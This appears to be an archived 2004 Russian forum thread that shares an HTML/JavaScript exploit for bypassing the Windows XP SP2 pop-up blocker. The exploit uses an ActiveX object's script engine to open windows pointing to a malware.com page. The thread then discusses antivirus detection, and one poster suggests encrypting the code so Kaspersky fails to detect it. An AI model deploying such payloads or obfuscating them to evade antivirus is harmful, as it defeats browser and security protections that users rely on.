PDA

Просмотр полной версии : Обход блокировки pop-up окон в XP SP2.


Andrey
14.12.2004, 17:01
Найдена возможность обхода блокировщика pop-up окон в Windows XP SP2.

Эксплоит:
----------------------------------------------------------------------------
< body onload="setTimeout(&#039; main() &#039;,1000)">
< object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
< PARAM NAME="ActivateApplets" VALUE="1">
< PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>

< SCRIPT>

// 10.11.04 http://www.editive.com

function shellscript()
{
open("http://www.malware.com/flywin.html","_blank","scrollbar=no");
showModalDialog("http://www.malware.com/flywin.html");
}

function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>






<center><img src=nocigar.gif>

<FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>
----------------------------------------------------------------------------
http://www.xakep.ru/post/24994/default.asp
Andrey
14.12.2004, 18:07
Kaspersky Anti-Virus обнаруживает этот Exploit как: not-virus:Joke.JS.Spawn.c
Xen
15.12.2004, 03:38
Можно шифрануть так, что хренов каспер обЛАМается задетектить. Ну вот какого черта засорять базы таким хламом... тем более что этот код для сп2 попапов далеко не единственный...
Andrey
15.12.2004, 17:27
Можно шифрануть так, что хренов каспер обЛАМается задетектить. Ну вот какого черта засорять базы таким хламом... тем более что этот код для сп2 попапов далеко не единственный...

О том, что всяко «говна» (вирусами не когда не являвшимися) в базах KAV «выше крыши», известно давно. Вот и «глючит» порой Каспера на машинах пользователей.
Geser
15.12.2004, 18:40
О том, что всяко «говна» (вирусами не когда не являвшимися) в базах KAV «выше крыши», известно давно. Вот и «глючит» порой Каспера на машинах пользователей.

И тем не менее есть многие предпочитают иметь защиту от того что не является вирусами, но что может заглючить комп похуже всякого вируса. Для многих окно с порнухой открывающееся каждые 2 минуты хуже любого вируса.
Xen
16.12.2004, 12:15
Окно с порнухой на пустом месте не открывается ;))) ходишь по фришным галерам - будь готов к попапам! :-)

По мне так хуже всего, когда вместо попапа начинает визжать антивирус, как будто режет кто его. Да и вообще интернет эксплорером браузить по злачным местам никогда не рекомендовалось.
Geser
16.12.2004, 13:49
Окно с порнухой на пустом месте не открывается ;))) ходишь по фришным галерам - будь готов к попапам! :-)


Так вирусы тоже на пустом месте не пойвляются. А антивирус можно настроить на удаление вирусов без запроса и без звука.